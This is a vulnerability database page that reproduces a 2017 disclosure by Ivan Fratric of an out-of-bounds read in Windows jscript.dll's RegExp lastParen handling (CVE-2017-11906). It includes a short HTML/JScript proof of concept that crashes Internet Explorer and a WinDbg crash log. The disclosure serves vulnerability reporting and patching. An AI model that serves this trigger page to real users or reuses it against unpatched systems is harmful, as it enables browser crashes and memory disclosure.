Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Microsoft Windows jscript!RegExpFncObj::LastParen Out-Of-Bounds Read

🗓️ 19 Dec 2017 00:00:00Reported by Ivan FratricType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 66 Views

Windows jscript!RegExpFncObj::LastParen Out-Of-Bounds Read CVE-2017-1190

Related
Code
ReporterTitlePublishedViews
Family
0day.today		Microsoft Windows jscript!RegExpFncObj::LastParen Out-Of-Bounds Read Exploit
19 Dec 201700:00
zdt
ATTACKERKB		CVE-2017-11906
12 Dec 201721:29
attackerkb
ATTACKERKB		CVE-2017-11919
12 Dec 201721:29
attackerkb
ATTACKERKB		CVE-2017-11887
12 Dec 201721:29
attackerkb
Circl		CVE-2017-11906
13 Dec 201704:00
circl
CNVD		Microsoft Internet Explorer Information Disclosure Vulnerability (CNVD-2018-00751)
13 Dec 201700:00
cnvd
Check Point Advisories		Microsoft Internet Explorer Scripting Engine Information Disclosure (CVE-2017-11906)
20 Dec 201700:00
checkpoint_advisories
CVE		CVE-2017-11906
12 Dec 201721:00
cve
Cvelist		CVE-2017-11906
12 Dec 201721:00
cvelist
Microsoft KB		Internet Explorer help
12 Dec 201708:00
mskb
Rows per page
`Windows: out-of-bounds read in jscript!RegExpFncObj::LastParen   
  
CVE-2017-11906  
  
  
There is an out-of-bounds read in jscript.dll library (used in IE, WPAD and other places):  
  
PoC for IE (note: page heap might be required to obsorve the crash):  
  
=========================================  
  
<!-- saved from url=(0014)about:internet -->  
<meta http-equiv="X-UA-Compatible" content="IE=8"></meta>  
<script language="Jscript.Encode">  
  
function go() {  
var r= new RegExp(Array(100).join('()'));  
''.search(r);  
alert(RegExp.lastParen);  
}  
  
go();  
  
</script>  
  
=========================================  
  
Debug log:  
  
=========================================  
  
(cec.a14): Access violation - code c0000005 (first chance)  
First chance exceptions are reported before any exception handling.  
This exception may be expected and handled.  
jscript!RegExpFncObj::LastParen+0x43:  
000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????  
  
0:014> r  
rax=0000000000000063 rbx=000000000476fd90 rcx=0000000000000063  
rdx=0000000000000064 rsi=000000000476fd90 rdi=000007fef23d37d0  
rip=000007fef23d3813 rsp=00000000130f9090 rbp=00000000130f9148  
<a href="https://crrev.com/8" title="" class="" rel="nofollow">r8</a>=00000000130f9210 <a href="https://crrev.com/9" title="" class="" rel="nofollow">r9</a>=0000000000000000 <a href="https://crrev.com/10" title="" class="" rel="nofollow">r10</a>=000000000463fef0  
<a href="https://crrev.com/11" title="" class="" rel="nofollow">r11</a>=000000000463ff38 <a href="https://crrev.com/12" title="" class="" rel="nofollow">r12</a>=0000000000000083 <a href="https://crrev.com/13" title="" class="" rel="nofollow">r13</a>=0000000000000000  
<a href="https://crrev.com/14" title="" class="" rel="nofollow">r14</a>=00000000130f9210 <a href="https://crrev.com/15" title="" class="" rel="nofollow">r15</a>=0000000000000000  
iopl=0 nv up ei pl nz na po nc  
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010206  
jscript!RegExpFncObj::LastParen+0x43:  
000007fe`f23d3813 4863accbac000000 movsxd rbp,dword ptr [rbx+rcx*8+0ACh] ds:00000000`04770154=????????  
  
0:014> k  
# Child-SP RetAddr Call Site  
00 00000000`130f9090 000007fe`f2385e6d jscript!RegExpFncObj::LastParen+0x43  
01 00000000`130f90e0 000007fe`f236b293 jscript!NameTbl::GetVal+0x3d5  
02 00000000`130f9170 000007fe`f2369d27 jscript!VAR::InvokeByName+0x873  
03 00000000`130f9380 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x373  
04 00000000`130fa180 000007fe`f23694b3 jscript!ScrFncObj::CallWithFrameOnStack+0x162  
05 00000000`130fa390 000007fe`f23686ea jscript!NameTbl::InvokeInternal+0x2d3  
06 00000000`130fa4b0 000007fe`f23624b8 jscript!VAR::InvokeByDispID+0xffffffff`ffffffea  
07 00000000`130fa500 000007fe`f2368ec2 jscript!CScriptRuntime::Run+0x5a6  
08 00000000`130fb300 000007fe`f2368d2b jscript!ScrFncObj::CallWithFrameOnStack+0x162  
09 00000000`130fb510 000007fe`f2368b95 jscript!ScrFncObj::Call+0xb7  
0a 00000000`130fb5b0 000007fe`f236e6c0 jscript!CSession::Execute+0x19e  
0b 00000000`130fb680 000007fe`f23770e7 jscript!COleScript::ExecutePendingScripts+0x17a  
0c 00000000`130fb750 000007fe`f23768d6 jscript!COleScript::ParseScriptTextCore+0x267  
0d 00000000`130fb840 000007fe`e9a85251 jscript!COleScript::ParseScriptText+0x56  
0e 00000000`130fb8a0 000007fe`ea20b320 MSHTML!CActiveScriptHolder::ParseScriptText+0xc1  
0f 00000000`130fb920 000007fe`e9a86256 MSHTML!CScriptCollection::ParseScriptText+0x37f  
10 00000000`130fba00 000007fe`e9a85c8e MSHTML!CScriptData::CommitCode+0x3d9  
11 00000000`130fbbd0 000007fe`e9a85a11 MSHTML!CScriptData::Execute+0x283  
12 00000000`130fbc90 000007fe`ea2446fb MSHTML!CHtmScriptParseCtx::Execute+0x101  
13 00000000`130fbcd0 000007fe`e9b28a5b MSHTML!CHtmParseBase::Execute+0x235  
14 00000000`130fbd70 000007fe`e9a02e39 MSHTML!CHtmPost::Broadcast+0x90  
15 00000000`130fbdb0 000007fe`e9a5caef MSHTML!CHtmPost::Exec+0x4bb  
16 00000000`130fbfc0 000007fe`e9a5ca40 MSHTML!CHtmPost::Run+0x3f  
17 00000000`130fbff0 000007fe`e9a5da12 MSHTML!PostManExecute+0x70  
18 00000000`130fc070 000007fe`e9a60843 MSHTML!PostManResume+0xa1  
19 00000000`130fc0b0 000007fe`e9a46fc7 MSHTML!CHtmPost::OnDwnChanCallback+0x43  
1a 00000000`130fc100 000007fe`ea274f78 MSHTML!CDwnChan::OnMethodCall+0x41  
1b 00000000`130fc130 000007fe`e9969d75 MSHTML!GlobalWndOnMethodCall+0x240  
1c 00000000`130fc1d0 00000000`771f9bbd MSHTML!GlobalWndProc+0x150  
1d 00000000`130fc250 00000000`771f98c2 USER32!UserCallWinProcCheckWow+0x1ad  
1e 00000000`130fc310 000007fe`f2694a87 USER32!DispatchMessageWorker+0x3b5  
1f 00000000`130fc390 000007fe`f269babb IEFRAME!CTabWindow::_TabWindowThreadProc+0x555  
20 00000000`130ff610 000007fe`fe4c572f IEFRAME!LCIETab_ThreadProc+0x3a3  
21 00000000`130ff740 000007fe`f535925f iertutil!_IsoThreadProc_WrapperToReleaseScope+0x1f  
22 00000000`130ff770 00000000`772f59cd IEShims!NS_CreateThread::DesktopIE_ThreadProc+0x9f  
23 00000000`130ff7c0 00000000`7742a561 kernel32!BaseThreadInitThunk+0xd  
24 00000000`130ff7f0 00000000`00000000 ntdll!RtlUserThreadStart+0x1d  
  
=========================================  
  
  
This bug is subject to a 90 day disclosure deadline. After 90 days elapse  
or a patch has been made broadly available, the bug report will become  
visible to the public.  
  
  
  
  
Found by: ifratric  
  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
19 Dec 2017 00:00Current
0.2Low risk
Vulners AI Score0.2
EPSS0.58879
microsoft windowsjscript!regexpfncobj::lastparenout-of-bounds readcve-2017-11906jscript.dllinternet explorer
66